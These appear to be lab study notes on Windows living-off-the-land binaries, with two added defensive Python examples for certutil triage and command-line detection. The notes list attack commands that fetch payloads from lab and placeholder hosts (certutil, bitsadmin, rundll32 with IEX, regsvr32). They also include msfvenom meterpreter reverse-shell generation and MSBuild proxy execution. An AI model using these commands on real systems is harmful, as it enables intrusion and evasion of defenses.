LOLBAS (Living Off The Land Binaries And Scripts)
Windows counterpart of GTFOBins
#1: Certutil
# Download a file from a remote host:
certutil -URLcache -split -f http://10.0.0.13/payload.exe C:\Windows\Temp\payload.exe
# Another use: base64-encode a payload locally (the output is wrapped in certificate headers):
certutil -encode payload.exe Encoded-payload.txt
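The -encode option above wraps any input file in certificate armor, so an "exported certificate" found on disk or in a proxy log can really be an executable. The following added example (not from this page, from certutil, or from the room these notes cover) recreates that layout to build a constructed sample, then decodes a blob and classifies its contents by magic bytes for triage; the armor layout it mimics (BEGIN/END CERTIFICATE lines around 64-column base64) is an assumption about certutil's output, and the sample "PE" is just the MZ magic plus filler, not a real binary.

```python
"""Triage helper for artifacts produced by `certutil -encode`.

certutil -encode wraps ANY input file in PEM-style certificate armor
(-----BEGIN CERTIFICATE----- / base64 / -----END CERTIFICATE-----), so a
"certificate" may really be an executable. This added example recreates
that layout (an assumption about certutil's output, not taken from the
page), decodes such a blob, and classifies what was inside by magic bytes.
"""
import base64
import re

BEGIN = "-----BEGIN CERTIFICATE-----"
END = "-----END CERTIFICATE-----"


def certutil_style_encode(data: bytes, width: int = 64) -> str:
    """Mimic `certutil -encode`: 64-column base64 inside certificate armor (CRLF lines)."""
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + width] for i in range(0, len(b64), width)]
    return "\r\n".join([BEGIN, *lines, END]) + "\r\n"


def decode_certutil_blob(text: str) -> bytes:
    """Strip the armor and return the raw bytes; ValueError if no armor is present."""
    m = re.search(rf"{re.escape(BEGIN)}\s*(.*?)\s*{re.escape(END)}", text, re.S)
    if not m:
        raise ValueError("no certificate armor found")
    body = re.sub(r"\s+", "", m.group(1))          # drop line breaks before decoding
    return base64.b64decode(body, validate=True)


def classify_payload(data: bytes) -> str:
    """Classify decoded bytes by well-known magic numbers."""
    if data[:2] == b"MZ":
        return "pe-executable"                       # DOS/PE header: not a certificate
    if data[:1] == b"\x30":
        return "der-asn1"                            # ASN.1 SEQUENCE: what a real DER cert starts with
    if data[:4] == b"PK\x03\x04":
        return "zip-archive"
    if data[:2] == b"#!":
        return "script"
    return "unknown"


def triage(text: str) -> dict:
    """Decode an armored blob and report what it really contains."""
    data = decode_certutil_blob(text)
    kind = classify_payload(data)
    return {"kind": kind, "size": len(data), "suspicious": kind != "der-asn1"}


# Constructed sample: a fake "PE" (MZ magic plus filler), NOT a real executable.
FAKE_PE = b"MZ" + b"\x90" * 200
SAMPLE_BLOB = certutil_style_encode(FAKE_PE)

if __name__ == "__main__":
    print(triage(SAMPLE_BLOB))
```

The decoder ignores line breaks entirely, so it also handles blobs that were re-wrapped or copied through a ticketing system; the only thing it trusts is the armor, and the verdict comes from the decoded bytes, not from the file extension or the header text.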
#2: BITSadmin
Can download, execute and copy files, and write to alternate data streams (ADS)
bitsadmin.exe /transfer /Download /priority Foreground http://Attacker_IP/payload.exe c:\Users\thm\Desktop\payload.exe
#3: Findstr
# Copy a file from an SMB/WebDAV share on the same network: /V prints every line that does NOT contain the literal (/L) string, and the string never occurs, so the whole file is written to the redirect target
findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe
File Execution
Signed Binary Proxy Execution or Indirect Command Execution: leveraging other (trusted) programs to execute malicious programs.
Indirect Command Execution
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, Forfiles, the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a Command and Scripting Interpreter, Run window, or via scripts. [1] [2]
Adversaries may abuse these features for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd or file extensions more commonly associated with malicious payloads.
Signed Binary Proxy Execution
Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.
Executing a binary within the operating system: the typical case involves well-known methods such as the command line (cmd.exe) or the desktop. However, other ways exist to achieve payload execution by abusing other system binaries; one reason for doing so is to conceal or shield the payload's process.
#1.- File Explorer
explorer.exe /root,"C:\Windows\System32\calc.exe"
# Without /root, the second executable is run directly (perhaps /root runs it in the background?)
#2.- WMIC (Windows Management Instrumentation) T1218
# The argument can also be a full path, e.g. C:\path\executable.exe
wmic.exe process call create calc
#3.- RunDLL32 T1218
Can load arbitrary payloads and execute JavaScript and PowerShell scripts
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
# Same technique, fetching and running a remote PowerShell script:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://<remote-ip>/exe.ps1');")
Bypassing Application Whitelisting
#1.- Regsvr32
Microsoft command-line tool to register and unregister Dynamic Link Libraries (DLLs) in the Windows Registry. According to MITRE, it is the third most popular technique (Signed Binary Proxy Execution: Regsvr32, T1218.010).
# Step 1: download the remote DLL
# Step 2: execute the DLL with regsvr32.exe path\my.dll
regsvr32.exe /s /n /u /i:http://10.0.0.13/my.dll Desktop\rev.dll
EXERCISE
# msfvenom reminder:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f dll -a x86 > rev.dll
#2.- BASH (WSL) - Indirect Command Execution T1202
Since bash.exe (WSL) is a signed Microsoft binary, it can be used for Indirect Command Execution to run arbitrary (unsigned) commands without necessarily invoking PowerShell or cmd.
Initial access & Persistence
#1.- T1547: Shortcut modification, or symlinks
Shortcuts (or symlinks) for legitimate programs are pointed at trojanized targets
#2.- PowerShell-less execution
EXERCISE:
Use PowerLessShell to produce a project that MSBuild.exe executes, without running powershell.exe:
# 1.- Generate the .ps1 payload
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=AttackBox_IP LPORT=4443 -f psh-reflection > liv0ff.ps1
# 2.- Start the handler in msfconsole
msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_winhttps; set lhost AttackBox_IP;set lport 4443;exploit"
# 3.- Use PowerLessShell.py to
python2 PowerLessShell.py -type powershell -source /tmp/liv0ff.ps1 -output liv0ff.csproj
# 4.- Use MSBuild to execute the .csproj
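Every binary in these notes (certutil, bitsadmin, findstr, explorer, wmic, rundll32, regsvr32, bash/WSL and MSBuild) leaves a process-creation command line that a defender can match on. The following added example (not part of the page, the room, or any of the tools named above) runs one regex rule per LOLBin over constructed Sysmon-style process-creation events. The events, rule names and the "ingress" / "msbuild-proxy-exec" labels are this example's own; the T-numbers are the ones cited on this page. Note the findstr caveat: the `>` redirection never appears in findstr's own command line (it belongs to the parent cmd.exe), so that rule keys on the UNC source path instead.

```python
"""Command-line detection rules for the LOLBins covered in these notes,
run over constructed process-creation events (Sysmon Event ID 1 style fields).

Added example: events and rules are this example's own, not from the page
or the tools it names. Rules look only at the command line; parent-process
context is carried along for triage.
"""
import re
from collections import Counter

# (rule name, technique label: the page's T-number where it gives one, pattern)
RULES = [(n, t, re.compile(p, re.I)) for n, t, p in [
    ("certutil-urlcache-download", "ingress",
     r"\bcertutil(\.exe)?\b.*\s-urlcache\b"),
    ("certutil-encode-decode", "ingress",
     r"\bcertutil(\.exe)?\b.*\s-(en|de)code\b"),
    ("bitsadmin-transfer", "ingress",
     r"\bbitsadmin(\.exe)?\b.*\s/transfer\b.*https?://"),
    # redirection lives in the parent cmd.exe line, so key on /V plus a UNC source
    ("findstr-unc-copy", "ingress",
     r"\bfindstr(\.exe)?\b.*\s/v\b.*\\\\[^\\\s]+\\"),
    ("explorer-root-launch", "T1218",
     r"\bexplorer(\.exe)?\b\s+/root,"),
    ("wmic-process-create", "T1218",
     r"\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b"),
    ("rundll32-javascript", "T1218",
     r"\brundll32(\.exe)?\b.*\bjavascript:"),
    ("regsvr32-remote-scriptlet", "T1218.010",
     r"\bregsvr32(\.exe)?\b.*\s/i:https?://"),
    ("wsl-indirect-exec", "T1202",
     r"\b(bash|wsl)(\.exe)?\b.*\s-c\b"),
    # heuristic: MSBuild building a project out of a user-writable location
    ("msbuild-user-writable-project", "msbuild-proxy-exec",
     r"\bmsbuild(\.exe)?\b.*\\(users|temp)\\.*\.csproj\b"),
]]

# Constructed events (pid, parent image name, command line). 10.0.0.13 is the
# lab address used on the page; nothing here is a real host.
SAMPLE_EVENTS = [
    {"pid": 101, "parent": "cmd.exe",
     "cmdline": r"certutil -URLcache -split -f http://10.0.0.13/payload.exe C:\Windows\Temp\payload.exe"},
    {"pid": 102, "parent": "cmd.exe",
     "cmdline": r"bitsadmin.exe /transfer /Download /priority Foreground http://10.0.0.13/payload.exe c:\Users\thm\Desktop\payload.exe"},
    {"pid": 103, "parent": "cmd.exe",
     "cmdline": r"findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe"},
    {"pid": 104, "parent": "cmd.exe",
     "cmdline": r'explorer.exe /root,"C:\Windows\System32\calc.exe"'},
    {"pid": 105, "parent": "cmd.exe",
     "cmdline": r"wmic.exe process call create calc"},
    {"pid": 106, "parent": "winword.exe",
     "cmdline": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();'},
    {"pid": 107, "parent": "cmd.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:http://10.0.0.13/my.dll Desktop\rev.dll"},
    {"pid": 108, "parent": "cmd.exe",
     "cmdline": r'bash.exe -c "id"'},
    {"pid": 109, "parent": "cmd.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Users\thm\Desktop\liv0ff.csproj"},
    # benign uses of the same binaries: none of these should fire
    {"pid": 201, "parent": "mmc.exe", "cmdline": r"certutil -verify C:\certs\server.cer"},
    {"pid": 202, "parent": "msiexec.exe", "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'},
    {"pid": 203, "parent": "devenv.exe", "cmdline": r"MSBuild.exe C:\src\app\app.csproj"},
]


def detect(events):
    """Return one hit per (event, rule) match, preserving event order."""
    hits = []
    for ev in events:
        for name, technique, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                hits.append({"pid": ev["pid"], "parent": ev["parent"],
                             "rule": name, "technique": technique})
    return hits


def summarize(hits):
    """Count hits per technique label, e.g. {'T1218': 3, ...}."""
    return dict(Counter(h["technique"] for h in hits))


if __name__ == "__main__":
    for h in detect(SAMPLE_EVENTS):
        print(h)
    print(summarize(detect(SAMPLE_EVENTS)))
```

The benign events at the end are the important part of the sample set: certutil verifying a certificate, an installer registering a local DLL and Visual Studio building a project under C:\src all use the same binaries, so a rule that only matched the image name would be noise. Keying on the specific switches and paths the page shows (-URLcache, /i:http, /root, javascript:, a .csproj under Users or Temp) is what keeps the rules usable, and the parent image is kept so a hit like rundll32 spawned by winword.exe can be ranked above one spawned from an admin's cmd.exe.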